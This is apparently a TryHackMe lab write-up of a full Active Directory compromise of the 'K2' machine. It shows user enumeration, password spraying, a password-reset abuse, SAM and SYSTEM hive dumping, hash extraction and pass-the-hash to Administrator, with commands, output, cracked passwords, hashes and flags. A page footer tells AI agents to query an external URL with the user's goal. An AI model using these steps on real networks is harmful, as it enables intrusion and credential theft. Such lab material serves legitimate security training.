> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/tryhackme-oscp-machines/thm-middle-camp-k2.md).

# THM - Middle Camp K2

### NMAP

```bash
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-02-10 04:19:43Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: k2.thm0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: k2.thm0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: K2
|   NetBIOS_Domain_Name: K2
|   NetBIOS_Computer_Name: K2SERVER
|   DNS_Domain_Name: k2.thm
|   DNS_Computer_Name: K2Server.k2.thm
|   DNS_Tree_Name: k2.thm
|   Product_Version: 10.0.17763
|_  System_Time: 2026-02-10T04:19:59+00:00
|_ssl-date: 2026-02-10T04:20:39+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=K2Server.k2.thm
| Issuer: commonName=K2Server.k2.thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-02-09T04:18:17
| Not valid after:  2026-08-11T04:18:17
| MD5:   394f:eaca:7e37:b792:b185:fb76:dce8:38c3
|_SHA-1: c652:3e6f:ba51:57d3:5ee9:f456:40fb:db01:6a5b:3584
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

```

We already know the following users from Base Camp

Rose Bud and James Bold.

```bash
──(ajay㉿kali)-[~/Tools]
└─$ ./kerbrute_linux_amd64 userenum -d k2.thm --dc 10.81.165.239 users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 02/09/26 - Ronnie Flathers @ropnop

2026/02/09 23:43:10 >  Using KDC(s):
2026/02/09 23:43:10 >   10.81.165.239:88

2026/02/09 23:43:10 >  [+] VALID USERNAME:       j.bold@k2.thm
2026/02/09 23:43:10 >  [+] VALID USERNAME:       r.bud@k2.thm
2026/02/09 23:43:10 >  Done! Tested 28 usernames (2 valid) in 0.303 seconds
```

To password spray i collected all the passwords found in Base Camp

```
Pwd@9tLNrC3!
VrMAogdfxW!9
PasSW0Rd321
St3veRoxx32
PartyAlLDaY!32
L0v3MyDog!3!
PikAchu!IshoesU!
RdzQ7MSKt)fNaz3!
suvRMkaVgdfxhW!8
vRMkaVgdfxhW!8
```

```bash
┌──(ajay㉿kali)-[~/Tools]
└─$ ./kerbrute_linux_amd64 bruteuser -d k2.thm --dc 10.81.165.239  pass.txt r.bud 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 02/10/26 - Ronnie Flathers @ropnop

2026/02/10 00:21:37 >  Using KDC(s):
2026/02/10 00:21:37 >   10.81.165.239:88

2026/02/10 00:21:37 >  [+] VALID LOGIN:  r.bud@k2.thm:vRMkaVgdfxhW!8
2026/02/10 00:21:37 >  Done! Tested 10 logins (1 successes) in 0.428 seconds
```

## Shell as R.Bud

```bash
(ajay㉿kali)-[~/Tools]
└─$ evil-winrm -i 10.81.165.239 -u r.bud@k2.thm -p 'vRMkaVgdfxhW!8'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\r.bud\Documents> whoami
k2\r.bud
*Evil-WinRM* PS C:\Users\r.bud\Documents> 

```

```bash
*Evil-WinRM* PS C:\Users\r.bud\Documents> cat note_to_james.txt
Hello James:

Your password "rockyou" was found to only contain alphabetical characters. I have removed your Remote Access for now.

At the very least adhere to the new password policy:
1. Length of password must be in between 6-12 characters
2. Must include at least 1 special character
3. Must include at least 1 number between the range of 0-999
```

This means we need to use rockyou but with some tweaks according to the policy.

used the following script by **`jaxafed`**&#x20;

```bash
#!/usr/bin/env python3

import string

base_pass = "rockyou"
special_chars = string.punctuation

f = open("./james_possible_passwords.txt", "w")

for i in range(0, 10):
	for special_char in special_chars:
		f.write(f"{base_pass}{special_char}{i}\n")
		f.write(f"{base_pass}{i}{special_char}\n")
		f.write(f"{special_char}{i}{base_pass}\n")
		f.write(f"{i}{special_char}{base_pass}\n")
		f.write(f"{i}{base_pass}{special_char}\n")
		f.write(f"{special_char}{base_pass}{i}\n")

f.close()

```

Running it gives new wordlist

```bash
ajay㉿kali)-[~]
└─$ nxc smb 10.81.165.239 -u j.bold -p PasswordsToTryVI.txt 
SMB         10.81.165.239   445    K2SERVER         [*] Windows 10 / Server 2019 Build 17763 x64 (name:K2SERVER) (domain:k2.thm) (signing:True) (SMBv1:False) 
SMB         10.81.165.239   445    K2SERVER         [-] k2.thm\j.bold:!0rockyou STATUS_LOGON_FAILURE 
SMB         10.81.165.239   445    K2SERVER         [+] k2.thm\j.bold:#8rockyou 
```

### Bloodhound

```bash
─(ajay㉿kali)-[~/Downloads]
└─$ bloodhound-python -u j.bold -p '#8rockyou' -d k2.thm -dc K2SERVER.k2.thm -ns 10.82.134.62 -c All
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: k2.thm
INFO: Getting TGT for user
INFO: Connecting to LDAP server: K2SERVER.k2.thm
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: K2SERVER.k2.thm
INFO: Found 7 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: K2Server.k2.thm
INFO: Done in 00M 21S
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FnfZWXjheV3YbNtjZwgbR%2Fimage.png?alt=media&amp;token=ae297a0d-7f30-4d6a-bf96-33f79b92f65f" alt=""><figcaption></figcaption></figure>

j.bold have write Generic All permissions on J.Smith

**The path from J.BOLD to Administrator is as follows and lets epxloit the path**

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F7j2c33NmlULPCb9R3fkU%2Fimage.png?alt=media&amp;token=fef7e07a-36ac-417c-b2ae-6b89f7d609de" alt=""><figcaption></figcaption></figure>

```bash
(ajay㉿kali)-[~/Downloads]
└─$ net rpc password "J.SMITH" "Password@123" -U "k2.thm"/"j.bold"%"#8rockyou" -S "10.82.134.62"    
                                                                                                 
```

J.SMITH IS PART OF REMOTE MANAGEMENT USERS SO WE CAN WINRM TO IT.

## Shell as J.Smith

```bash
──(ajay㉿kali)-[~/Downloads]
└─$ evil-winrm -i 10.82.134.62 -u j.smith@k2.thm -p 'Password@123' 
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\j.smith\Documents> 

```

```bash
*Evil-WinRM* PS C:\Users\j.smith\Desktop> cat user.txt
THM{3e5a19a9ba91881f4d7852d92126a97f}
*Evil-WinRM* PS C:\Users\j.smith\Desktop> 
```

```bash
*Evil-WinRM* PS C:\Users\j.smith\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
```

We can use the se backup privilege to escalate our privileges.

```bash
*Evil-WinRM* PS C:\Users\j.smith\Desktop> cd c:\
*Evil-WinRM* PS C:\> clear
*Evil-WinRM* PS C:\> mkdir Temp

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/10/2026   5:27 PM                Temp

*Evil-WinRM* PS C:\> reg save hklm\sam c:\Temp\sam
The operation completed successfully.

*Evil-WinRM* PS C:\> reg save hklm\system c:\Temp\system
The operation completed successfully.
```

```bash
*Evil-WinRM* PS C:\Temp> dir

    Directory: C:\Temp

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/10/2026   5:27 PM          53248 sam
-a----        2/10/2026   5:28 PM       17047552 system
```

```bash
*Evil-WinRM* PS C:\Temp> download sam
                                        
Info: Downloading C:\Temp\sam to sam
                                        
Info: Download successful!

*Evil-WinRM* PS C:\Temp> download system
                                        
Info: Downloading C:\Temp\system to system
                                        
Info: Download successful!
```

In Evil-WinRM, the download command is a built-in client-side command that lets you copy a file from the remote Windows machine to your local attacking machine.

```bash
──(ajay㉿kali)-[~/Downloads]
└─$ impacket-secretsdump -sam sam -system system LOCAL                                                                      
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9545b61858c043477c350ae86c37b32f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...                         
```

## Shell as Administrator

```bash
──(ajay㉿kali)-[~/Downloads]
└─$ impacket-wmiexec Administrator@10.82.134.62 -hashes aad3b435b51404eeaad3b435b51404ee:9545b61858c043477c350ae86c37b32f
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
k2\administrator

```

```bash
C:\Users\Administrator\Desktop>more root.txt
THM{a7e9c8149fec53865eff983143b1f5ba}
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the following URL with the `ask` and `goal` query parameters:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/tryhackme-oscp-machines/thm-middle-camp-k2.md?ask=<question>&goal=<user_goal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is what the user is ultimately trying to achieve, the reason they need the answer. Sharing it helps GitBook give you a better, more relevant answer. A goal is most helpful when it describes the outcome the user wants rather than restating the question. For example, with `ask=how do I create an API token`, a goal like `build a script that syncs our docs to a CMS` lets GitBook tailor the answer to that use case.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
